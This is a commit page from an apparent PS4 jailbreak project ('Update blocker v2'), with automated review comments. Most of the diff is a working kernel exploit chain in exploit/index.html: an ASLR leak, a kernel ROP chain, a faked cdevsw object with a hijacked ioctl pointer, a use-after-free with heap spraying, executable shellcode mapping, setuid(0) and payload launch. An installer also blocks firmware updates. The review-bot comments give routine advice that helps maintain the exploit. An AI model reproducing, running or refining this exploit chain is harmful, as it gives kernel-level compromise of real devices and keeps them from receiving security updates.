Update blocker v2
xvortex committed Feb 5, 2018
1 parent a15b09a commit 83b1348
Showing 8 changed files with 381 additions and 242 deletions.
42 changes: 21 additions & 21 deletions exploit/index.html
Expand Up @@ -396,17 +396,17 @@

if(kexploitCheck == 0)
{
//print("Status: Kernel Patched!");
print("Status: Kernel Patched!");
}

if(kexploitCheck != 0)
{
//print("Status: Kernel Not Patched...");
print("Status: Kernel Not Patched...");
print("=== Starting Kernel Exploit Chain ===");

//////////////// SETUP ////////////////

//print("Allocating Buffers...");
print("Allocating Buffers...");

// Setup buffers for important pre-exploit stuff
var kernelBase = malloc(0x08);
Expand Down Expand Up @@ -437,7 +437,7 @@

//////////////// LEAK ////////////////

//print("Calculating ASLR and Object Base...");
print("Calculating ASLR and Object Base...");

p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));

Expand All @@ -462,14 +462,14 @@
return false;
}

//print("Kernel base: 0x" + kernelBase);
//print("Object leak: 0x" + objBase);
print("Kernel base: 0x" + kernelBase);
print("Object leak: 0x" + objBase);

p.write8(serviceBuff.add32(0x4), objBase);
p.writeString(serviceBuff.add32(0x28), "debug");

//////////////// BUILD KROP CHAIN ////////////////
//print("Building Kernel ROP Chain...");
print("Building Kernel ROP Chain...");

var kchainstack = malloc(0x200);
var kchain = new krop(p, kchainstack);
Expand Down Expand Up @@ -524,10 +524,10 @@
kchain.push(window.gadgets["pop rsp"]);
kchain.push(window.gadgets["push rax; jmp rcx"]);

//print("KROP chain size: " + kchain.count);
print("KROP chain size: " + kchain.count);

//////////////// FAKE THE OBJECT ////////////////
//print("Creating Fake Object...");
print("Creating Fake Object...");

//////// FAKE CDEV_PRIV ////////
p.write8(obj_cdev_priv.add32(0x008), 0x0000000000000004);
Expand All @@ -549,14 +549,14 @@
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER

//////////////// FREE THE OBJECT ////////////////
//print("Freeing the object!");
print("Freeing the object!");

var stage3 = new saferop(p, undefined);

stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_mdbg_service']]), 1, serviceBuff, 0);
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_namedobj_delete']]), p.read8(namedObj), 0x5000);

//print("Spraying the heap!");
print("Spraying the heap!");

for(var i = 0; i < 500; i++)
{
Expand All @@ -566,12 +566,12 @@
stage3.run();

//////////////// TRIGGER ////////////////
//print("Triggering kernel code execution");
print("Triggering kernel code execution");

p.syscall('sys_ioctl', p.read8(targetDevFd), 0x81200000, obj_cdev_priv);

//////////////// FIX ////////////////
//print("Allocating executable memory for fix payload...");
print("Allocating executable memory for fix payload...");

var baseAddressExecute = new int64(0xDEAD0000, 0);
var exploitExecuteAddress = p.syscall("sys_mmap", baseAddressExecute, 0x10000, 7, 0x1000, -1, 0);
Expand All @@ -587,7 +587,7 @@
p.write4(shellcode.add32(i * 4), fix[i]);
}

//print("Running fix payload...");
print("Running fix payload...");

var stage6 = new saferop(p, undefined);

Expand All @@ -603,8 +603,8 @@
// Display results
print("=== Verifying kexploit patches ===");

//print("setuid(0): " + p.syscall('sys_setuid', 0));
//print("getuid(): " + p.syscall('sys_getuid'));
print("setuid(0): " + p.syscall('sys_setuid', 0));
print("getuid(): " + p.syscall('sys_getuid'));

// Create payload memory
print("=== Launching Payload ===");
Expand Down Expand Up @@ -636,20 +636,20 @@
for (;;)
{
var result = p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name);
//print("scePthreadCreate: 0x" + result);
print("scePthreadCreate: 0x" + result);
if (result == 0)
{
var thread_id = p.read8(thread_id_ptr);
//print("thread: 0x" + thread_id);
print("thread: 0x" + thread_id);
var result = p.call(libkernel.add32(0x11610), thread_id, exit_code_ptr);

//print("scePthreadJoin: 0x" + result);
print("scePthreadJoin: 0x" + result);
if (result == 0)
{
var exit_code = p.read8(exit_code_ptr);
//print("exit code: " + exit_code);
print("exit code: " + exit_code);
print("=== Done ===");
alert(document.getElementById("console").innerHTML);
alert("Done");
break;
}
}
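Review bot: The `//print(...)` → `print(...)` flips spread across the hunks from `@@ -396` to `@@ -636` toggle diagnostic output by editing comments, which is why this file keeps churning between releases with no functional change. A single switch such as `var DEBUG = true;` with `function dprint(s) { if (DEBUG) print(s); }` and `dprint(...)` at these call sites would make the verbosity a one-line change, while the `=== ... ===` status lines that were already live can stay on `print`. The enclosing function starts before the first hunk and ends after the last, so the flag and helper would belong near its top, outside the visible lines.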
2 changes: 1 addition & 1 deletion exploit/payload.js

Large diffs are not rendered by default.

2 changes: 1 addition & 1 deletion installer/Makefile
Expand Up @@ -10,7 +10,7 @@ ODIR := build
SDIR := source
IDIRS := -I$(LIBPS4)/include -I. -Iinclude
LDIRS := -L$(LIBPS4) -L. -Llib
CFLAGS := $(IDIRS) -Os -std=gnu11 -fno-builtin -nostartfiles -nostdlib -fno-strict-aliasing -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
CFLAGS := $(IDIRS) -O3 -std=gnu11 -fno-builtin -nostartfiles -nostdlib -fno-strict-aliasing -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
SFLAGS := -nostartfiles -nostdlib -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
LFLAGS := $(LDIRS) -Xlinker -T $(LIBPS4)/linker.x -Wl,--build-id=none -Ttext=$(TEXT) -Tdata=$(DATA)
CFILES := $(wildcard $(SDIR)/*.c)
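Review bot: The `-Os` → `-O3` change on the CFLAGS line is unexplained, and on a freestanding build (`-fno-builtin -nostartfiles -nostdlib`) it is not a free upgrade: at `-O3` GCC's loop-distribute-patterns pass can turn plain loops into calls to `memcpy`/`memset`, which `-nostdlib` will not supply unless libps4 or the local lib does, and the larger object also has to fit the fixed `-Ttext=$(TEXT) -Tdata=$(DATA)` layout. If the payload has been verified to link and run at `-O3`, a comment above the line such as `# -O3 instead of -Os: <reason>; add -fno-tree-loop-distribute-patterns if memcpy/memset go unresolved` would record the trade-off; otherwise adding `-fno-tree-loop-distribute-patterns` to CFLAGS explicitly is the safer default. Whether the size budget is actually tight cannot be told from the Makefile alone.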
2 changes: 1 addition & 1 deletion installer/include/defines.h
@@ -1,7 +1,7 @@
#ifndef __DEFINES
#define __DEFINES

#define VERSION "1.1"
#define VERSION "1.2"

//#define DEBUG_SOCKET

9 changes: 6 additions & 3 deletions installer/source/main.c
Expand Up @@ -7,6 +7,7 @@
#define kernel_printf(format, ...) (void)0

#define PS4_UPDATE_FULL_PATH "/update/PS4UPDATE.PUP"
#define PS4_UPDATE_TEMP_PATH "/update/PS4UPDATE.PUP.net.temp"

const uint8_t payload_data_const[] =
{
Expand Down Expand Up @@ -284,16 +285,18 @@ int kernel_payload(struct thread *td, struct kernel_payload_args* args)

static inline void patch_update(void)
{
DIR* directory = opendir(PS4_UPDATE_FULL_PATH);
unlink(PS4_UPDATE_FULL_PATH);

DIR* directory = opendir(PS4_UPDATE_TEMP_PATH);

if(directory != NULL)
{
closedir(directory);
return;
}

unlink(PS4_UPDATE_FULL_PATH);
mkdir(PS4_UPDATE_FULL_PATH, 0777);
unlink(PS4_UPDATE_TEMP_PATH);
mkdir(PS4_UPDATE_TEMP_PATH, 0777);
}

int _main(struct thread *td) {
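Review bot: The new `unlink(PS4_UPDATE_FULL_PATH)`, `unlink(PS4_UPDATE_TEMP_PATH)` and `mkdir(PS4_UPDATE_TEMP_PATH, 0777)` calls in patch_update ignore their return values, so if the temp path cannot be removed or recreated the blocker silently ends up not in place and nothing reports it. Checking each result, e.g. `if (mkdir(PS4_UPDATE_TEMP_PATH, 0777) != 0) kernel_printf("mkdir %s failed\n", PS4_UPDATE_TEMP_PATH);`, keeps the failure visible in a build where kernel_printf is not stubbed out (in the configuration shown at the top of this file it expands to `(void)0`, so the release cost is nil). Also, the full path is now only unlinked and no longer replaced by a directory as it was before this commit; if occupying only the temp path is deliberate, a comment above the function such as `/* Occupy PS4_UPDATE_TEMP_PATH with a directory so the updater cannot stage there; the full path is merely cleared. */` would record that intent for the next reader. The early return when `opendir` succeeds presumably means "already done", which the same comment should say.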

0 comments on commit 83b1348
